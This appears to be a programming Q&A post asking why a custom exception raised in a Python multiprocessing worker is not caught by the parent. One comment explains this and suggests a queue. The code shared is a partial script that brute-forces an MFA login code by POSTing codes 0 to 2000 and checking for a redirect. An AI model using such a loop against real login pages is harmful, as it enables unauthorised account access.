# Custom Exception Handling with Multiple Processes (Python; multiprocessing)

Tags: python, python-3.x, exception, python-multiprocessing

I am working on a multi-process brute-force program for school (nothing bad). Essentially the program brute forces a log in code using multiple processes. I am using the multiprocessing package in Python. I created my own custom exception that is supposed to kill the remaining processes and exit gracefully once the code is found. The problem I'm having is that when my exception is raised, it is not being caught in the previous function. Does exception handling work with multiple processes? Is there something else I'm missing, like problems with my custom exception class?

```
class LogInFound(Exception):
    def terminate_processes(self, processes):
        for remaining_processes in processes:
            if remaining_processes.is_alive():
                remaining_processes.terminate()

def brute(start, end, session, url):
    for i in range(start, end):
        login2data = {
            'mfa-code' : i
        }
        resp = session.post(url, data=login2data, allow_redirects=False)
        if resp.status_code == 302:
            //do stuff
            raise(LogInFound)

def start_threads(session, url):
    processes = []
    try:
        for i in range(0, 2001, 100):
            start = i
            end = min(i + 100, 2001)
            process = multiprocessing.Process(target=brute, args=[start,end,session,url])
            processes.append(process)
            process.start()
        for process in processes:
            process.join()

    except LogInFound as log:
        log.terminate_processes(processes)
        return

def main()
    //do stuff
    start_threads(session, url)
```

The exception seems to be raising correctly, but it is not caught in the start_thread() function, therefore the program continues to try codes, even after the correct code has been found.

Comment: No, this just doesn't work. You can at most use the `exitcode` attribute to find out **if** a processes terminated due to an exception. Better use a queue for communication between processes.